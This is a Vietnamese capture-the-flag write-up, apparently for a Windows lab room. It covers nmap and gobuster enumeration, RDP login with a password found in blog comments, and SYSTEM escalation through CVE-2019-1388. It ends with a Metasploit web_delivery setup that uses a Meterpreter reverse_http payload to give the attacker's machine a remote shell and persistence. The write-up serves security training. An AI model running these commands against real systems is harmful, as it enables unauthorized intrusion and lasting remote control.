Bước 1: Thu thập thông tin
Now that we've launched our target, let's perform some basic enumeration of the services running on it!
Sử dụng công cụ nmap để dò quét thông tin
nmap -sC -Pn -T4 ip_victim
gobuster dir -u http://ip_victim -w /data/src/wordlists/directory-list-2.3-medium.txt -b 404,403 -t 50
Kết quả thu được đường dẫn /retro mình truy cập vào thấy được một website nói về rất nhiều trò chơi khá cổ ở đĩa DVD
Mình kéo xuống thêm một chút thì thấy được một tác giả tên là Wade mình thử truy cập vào phần RECENT COMMENTS của người này và phát hiện một thông tin về mật khẩu là: parzival
Từ thông tin thu thập được trên mình tiến hành sang bước 2.
Bước 2: Khai thác dịch vụ remote desktop
Now that we've gained access to our target system, let's see if we can find a way to escalate. To start, let's scout around the system to see if we can find anything of interest.
Mình truy cập tới máy chủ window victim để khai thác, sử dụng công cụ remina trên kali
Đọc lá cờ đầu trong tệp tin user.txt, sau đó tiến hành kiểm tra phát hiện một tệp tin là hhupd.exe chưa biết tệp này là gì mình thử tìm kiếm thông tin và phát hiện đây là một phầm mềm độc khai khai thác lỗ hổng về leo thang trên window mà không cần xác thực mã CVE-2019-1388
Mình dựa theo video khai thác demo sau để thực hiện leo thang
Mình mở tệp mã độc ra lần lượt thực hiện các bước để truy cập đến liên kết thực thi leo thang
cmd
whoami
Kiểm tra mình đã có quyền nt authority\system quyền cao nhất trên hệ thống window, mình liền vô kiểm tra thư mục user thấy user Administrator, mình vô thấy tệp tin root.txt, mình đọc nó là thu được lá cờ cuối cùng
Không dừng lại ở đây, vì thế nó hơi nhạt nhẽo mình sang bước số 3 tạo mã độc chảy ẩn trong hệ thống này gọi là một con trojan cho dễ để khai thác.
Bước 3: Tạo mã độc khai thác về sau
Now that we've thoroughly compromised our target machine, let's return to our exploitation tools so that we can gain remote shell access and persistence.
Mình tiến hành chạy msfconsole ở trên kali, sử dụng mã độc web_delivery
use exploit/multi/script/web_delivery
show targets
set target 2
set lhost ip_vpn_kali
set lport 443( tùy bạn)
set payload windows/meterpreter/reverse_http
set lhost ip_vpn_kali
run
sessions
sessions 1
getuid
0 Comments